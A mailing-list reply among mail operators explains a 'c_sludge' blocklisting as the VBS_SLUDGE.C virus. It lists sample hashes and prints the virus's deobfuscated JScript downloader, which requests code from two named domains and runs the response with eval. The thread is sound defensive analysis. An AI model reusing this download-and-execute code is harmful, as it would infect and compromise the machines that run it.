I'm not sure if this answers your question, but there is a virus with that signature name from 2012/2013, e.g 'VBS_SLUDGE.C' (trendmicro).
samples (available via vt): dc8da24b429b9e8c41a7ec87e0c69472ea47fe0d 7b7a22e0c819800cc25c55994cdb5ccb3f936ee4 the obfuscated vbs comes down to: <job><script language=JScript>var z2 = eval; var x = new Array("pinkcamille.com","sculpture-museum.org"); var z1 = "Msxml2.XMLHTTP"; var m = "LRYH8RItAFhs50laDTB44ry5AA1qQc18YnLyKXUMHNLcHT4DRycNKIqJg-BJUqMrC6UwAxAqzbATIx_IUHI"; for (var i=0; i<2; i++) { try { var e = new ActiveXObject(z1); e.open("GET", "http://"+x[i]+"/counter/?"+m+"1", false); e.send(); if (e.status == 200) { z2(e.responseText.split(m).join("a")); break; }; } catch(e) { }; };</script></job> hth, Stefan On 07/07/2017 03:37 PM, Kirk MacDonald wrote: > Struggling a bit to understand a development this morning about MTAs being > listed on Spamhaus for a CBL listing for something called c_sludge. The > Googles has really nothing helpful about what c_sludge is. > > Thoughts? Tips? > > > Kirk MacDonald > System Analyst II > Internet > Eastlink > > _______________________________________________ > mailop mailing list > mailop@mailop.org > https://chilli.nosignal.org/cgi-bin/mailman/listinfo/mailop >
signature.asc
Description: OpenPGP digital signature
_______________________________________________ mailop mailing list mailop@mailop.org https://chilli.nosignal.org/cgi-bin/mailman/listinfo/mailop